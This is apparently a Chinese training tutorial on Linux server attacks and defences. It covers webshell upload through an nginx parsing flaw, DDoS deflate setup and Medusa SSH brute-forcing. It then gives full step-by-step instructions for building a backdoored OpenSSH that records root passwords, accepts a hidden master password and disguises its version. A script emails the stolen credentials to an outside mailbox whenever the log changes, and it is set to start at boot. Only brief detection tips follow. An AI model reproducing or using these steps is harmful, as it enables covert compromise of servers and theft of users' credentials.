webshell-防止 DDOS-暴力破解-自动劫持密码

1、webshell使用方法

上传木马程序:
方法 1:nginx 解析漏洞。 把 aa.php 改成 aa.jpg ,通过网站中的上传图片功能上传到服务器。可以直接执行 php 程序。
详情:CVE-2013-4547 Nginx 解析漏洞深入利用及分析 :http://drops.wooyun.org/tips/2006
方法 2:把 webshell 通过 base64 编码加密后,注入数据库。使用时,解密后,再执行。

2、使用DDoS deflate 解决服务器被DDOS攻击的问题

1、防止 DDOS 攻击的方法
方法一: 手动写 iptables 规则,ip 地址数比较少时
方法二: 检测到访问次数比较多的 ip 地址后,自动添加 iptables 规则。如 fail2ban 或 linux+DDoS deflate
方法三:加大带宽,增加服务器,使用 CDN 技术
2、DDoS deflate 介绍
DDoS deflate 是一款免费的用来防御和减轻 DDoS 攻击的脚本。它通过 netstat 监测跟踪创建大量网络连接的 IP 地址,在检测到某个结点超过预设的限制时,该程序会通过 APF 或 IPTABLES 禁止或阻挡这些 IP。
3、检测是否有 DDOS 攻击
执行:

netstat -ntu | awk '{print $5}' | cut -d: -f4 | sort | uniq -c | sort -n

如果发现某个 IP 连接数据上百的链接,说明就有 DDOS 攻击。
4、安装DDoS deflate

wget http://www.inetbase.com/scripts/ddos/install.sh
chmod 700 install.sh #添加权限
./install.sh #执行

5、查看安装后的配置文件
DDoS deflate 的默认配置位于/usr/local/ddos/ddos.conf ,内容如下:

vim /usr/local/ddos/ddos.conf 
##### Paths of the script and other files
PROGDIR="/usr/local/ddos"
PROG="/usr/local/ddos/ddos.sh" #要执行的 DDOS 脚本
IGNORE_IP_LIST="/usr/local/ddos/ignore.ip.list" #IP 地址白名单,注:在这个文件中 IP 不受控制。
CRON="/etc/cron.d/ddos.cron" #定时执行程序

6、查看定时任务

cat /etc/cron.d/ddos.cron
SHELL=/bin/sh
0-59/1 * * * * root /usr/local/ddos/ddos.sh >/dev/null 2>&1

7、场景: 如果 1 分钟内,一个 IP 地址对我们服务器访问 150 次以上,就认为发生 DDOS,使用iptables 把这个 IP 地址自动屏蔽掉。

vim /usr/local/ddos/ddos.conf
##### frequency in minutes for running the script
##### Caution: Every time this setting is changed, run the script with --cron
##### option so that the new frequency takes effect
FREQ=1 #检查时间间隔,默认 1 分钟
##### How many connections define a bad IP? Indicate that below.
NO_OF_CONNECTIONS=150 #最大连接数,超过这个数 IP 就会被屏蔽,一般默认即可
##### APF_BAN=1 (Make sure your APF version is atleast 0.96)
##### APF_BAN=0 (Uses iptables for banning ips instead of APF)
APF_BAN=1 #使用APF 还是iptables。推荐使用 iptables,将APF_BAN 的值改为 0即可。
改:19 APF_BAN=1
为:19 APF_BAN=0
##### KILL=0 (Bad IPs are'nt banned, good for interactive execution of script)
##### KILL=1 (Recommended setting)
KILL=1 #是否屏蔽 IP,默认即可
##### An email is sent to the following address when an IP is banned.
##### Blank would suppress sending of mails
EMAIL_TO=kill@ningfg.cn #当 IP 被屏蔽时给指定邮箱发送邮件报警,换成自己的邮箱即可
##### Number of seconds the banned ip should remain in blacklist.
BAN_PERIOD=600 #禁用 IP 时间,默认 600 秒,可根据情况调整

注:安装后,不需要手动运行任何软件,因为有 crontab 计划任务,每过一分钟,会行自动执行一次。检查是否有不正常的访问量
8、卸载

wget http://www.inetbase.com/scripts/ddos/uninstall.ddos
chmod +x uninstall.ddos
 ./uninstall.ddos

3、使用 Medusa 美杜莎暴力破解 SSH 密码

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的暴力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa 和 hydra 一样,同样属于在线密码破解工具。Medusa 是支持 AFP,CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3,PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet,VmAuthd, VNC、Generic Wrapper 以及 Web 表单的密码爆破工具。
官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。
软件下载地址:https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

1、安装 medusa ,手动编译和安装 medusa

yum install libssh2-devel libssh2-devel -y
tar zxvf 2.2.tar.gz
cd medusa-2.2/
./configure --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes

这个参数中加入很多模块,这样方便后期使用。--enable-module-ssh=yes 这个就是稍后要使用的暴力破解 sshd 服务的模块。

make -j 4
make install #安装完成后,会将 medusa 的一些modules 文件复制到/usr/local/lib/medusa/modules 文件夹。
ls /usr/local/lib/medusa/modules #查看已经生成的模块

2、Medusa 参数说明
Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT] 目标主机名称或者 IP 地址
-H [FILE] 包含目标主机名称或者 IP 地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-p [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-O [FILE] 日志信息文件
-e [n/s/ns] n 代表空密码,s 代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认 Tcp 端口
-s 启用 SSL
-r [NUM] 重试间隔时间,默认为 3 秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第一个有效的用户名/密码后停止审计。
-q 显示模块的使用信息
-v [NUM] 详细级别(0-6)
-w [NUM] 错误调试级别(0-10)
-V 显示版本
-Z [TEXT] 继续扫描上一次
3、破解单一服务器 SSH 密码
例 1:通过文件来指定 host 和 user,host.txt 为目标主机名称或者 IP 地址,user.txt 指定需要暴力破解的用户名,密码指定为 123456。

cd
echo 192.178.1.63 > /root/host.txt
echo root > /root/users.txt
medusa -M ssh -H ./host.txt -U ./users.txt -p 123456

例 2:对单一服务器进行密码字典暴力破解

 medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt  #p.txt 为密码字典

例 3:加-O ssh.log 可以将成功破解的记录记录到 ssh.log 文件中

medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt -O ./ssh.log

4、自动劫持 root 密码并转发密码到邮箱(RHEL 6,在 Centos7 下无法实现)

思路:在 63 上安装一个打了后门补丁的 sshd 服务,当用户来连接时,直接把密码记录下来。然后使用脚本发给我们的邮箱中。

1、安装gcc

ssh -V #查看安装前 ssh 版本
gcc -v #确认安装 gcc
yum install gcc

2、上传 0x06-openssh-5.9p1.patch.tar.gz , openssh-5.9p1.tar.gz ,inotify-tools-3.13.tar.gz 到 linux 的/tmp 目录,解压文件

cd /tmp
tar zxvf openssh-5.9p1.tar.gz
tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

3、对 openssh-5.9p1 打后门漏洞补丁

1、打补丁

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff #打补就修改或者替换原来的文件

patching file auth.c #认证
patching file auth-pam.c #认证
patching file auth-passwd.c #认证
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c #关于 sshd 服务端
patching file sshconnect2.c #关于 sshd 连接
patching file sshlogin.c #关于登录,把 root 密码记录下来
patching file version.h #关于版本

2、修改后门密码和记录 root 密码的文件夹目录

vim /tmp/openssh-5.9p1/includes.h
改:
177 #define ILOG "/tmp/ilog" #记录登录到本机的用户名和密码
178 #define OLOG "/tmp/olog" #记录从本机登录到其他服务器上的用户名和密码
179 #define SECRETPW "apaajaboleh" #你后门密码
为:
177 #define ILOG "/usr/share/ifile"
178 #define OLOG "/usr/share/ofile"
179 #define SECRETPW "ningfg"

3、为了使用安后的版本和原系统的版本一样,修改版本号:

vim /tmp/openssh-5.9p1/version.h
改:
 3 #define SSH_VERSION "OpenSSH_5.8p1 Debian-1ubuntu3"
 4
 5 #define SSH_PORTABLE "p1"
为:
 3 #define SSH_VERSION " OpenSSH_5.3"
 4
 5 #define SSH_PORTABLE "p1"

4、安装打了后门补丁的 sshd 服务

yum install -y openssl openssl-devel pam-devel zlib zlib-devel
# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

参数说明:
--prefix=/usr #指定安装到/usr 目录下
--sysconfdir=/etc/ssh #指定 sshd 服务配置文件目录
--with-pam #支持 pam 认证
--with-kerberos5 #支持 kerberos 认证

make -j 4 && make install

扩展: 通过 rpm -Vf 检查命令是否被替换

rpm -Vf /usr/bin/scp

可以看到很多 ssh 协议相关的命令,都被我们安装的 sshd 服务相关的命令替换了。这是黑客经常做的事情。

5、重启 sshd 服务

service sshd restart

6、测试劫持密码
测试前,发现/usr/share/ifile 文件没有存在
7、使用 xshell 登录 xuegod63,模拟远程登录
8、查看劫持到 root 密码

cat /usr/share/ifile
user:password --> root:123456

9、另外我们也可以使用后门密码来登录 root 帐号

ssh root@192.168.1.63 输入密码:ningfg

cat /usr/share/ofile
user:password@host --> root:ningfg@192.168.1.63

2、测试记录远程主机的密码

1、使用 63 登录远程主机 64

ssh root@192.168.1.64
exit

2、在63上查看记录,从64登录到远程主机的密码

cat /usr/share/ofile 
user:password@host --> root:123456@192.168.1.63
user:password@host --> root:123456@192.168.1.64

3、自动发送邮件

以 163 的 smtp 服务器为例,实现自动发送邮件有以下两种方法:
方法 1:通过 sendmail 或 postfix 给自己发邮件。 缺点: 需要开服务
方法 2:LINUX 下通过外部 SMTP 服务器发邮件,就像在 Linux 安装一个 foxmail。
1、使用 mail.rc 实现发邮件

vim /etc/mail.rc #在此文件中间,随机找个位置插入以下内容:
set from=helloworld14@163.com smtp=smtp.173.com
set smtp-auth-user=helloworld14 smtp-auth-password=PASSWORD smtp-auth=login

注:
set from=helloworld14@163.com #指定发件人的邮箱,这里我们就写成和收件人的邮箱一样。
set smtp-auth-user=helloworld14 #写自己发件人的邮箱帐号
smtp-auth-password=PASSWORD #写自己发件人的邮箱密码
2、配置 173 邮箱,开启 pop3/smtp 服务
登录 mail.163.com 网站
点:设置->POP3/SMTP/IMAP->开启 pop3 服务(勾选开启 pop3 服务后,smtp 也会自动开启)
设置第三方邮件客户端密码完成后,随后出现设置授权提示,点击确定即可完成设置
3、测试邮件发送

mail -s "demo title" ningfg@163.com < /usr/share/ifile # 发送后到邮箱查看

4、编写 shell 脚本自动发邮件,邮件的主题是服务器的 IP 地址

vim /bin/zipmail #写入以下内容
#!/bin/bash
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
mail -s $ip ningfg@163.com < /usr/share/ifile
chmod +x /bin/zipmail

5、测试

zipmail # 发现也可以收到邮件,说明成功。

4、实现当用户修改密码后,自动发邮件

1、安装 inotify

cd /tmp/
tar -zxvf inotify-tools-3.13.tar.gz
cd inotify-tools-3.13
./configure #检查安装环境
make -j 4 && make install #编译安装。

2、编写触发式自动发邮件脚本

vim /bin/zipmail 
#!/bin/bash
/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /usr/share/ifile |while read a b c
do
ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`
mail -s $ip ningfg@163.com < /usr/share/ifile
done

3、设置开机启动 zipmail 脚本

vim /etc/rc.local #在此文件的最后插入以下内容。
/bin/zipmail &

5、排查
方法1:

ps -axu | grep inoti #查看进程是否运行

方法2:

rpm -Vf /usr/bin/ssh #查看命令是否被黑客替换
上一篇:DDOS攻击事件记录


下一篇:近期频发的ddos,还有哪些欢迎爆料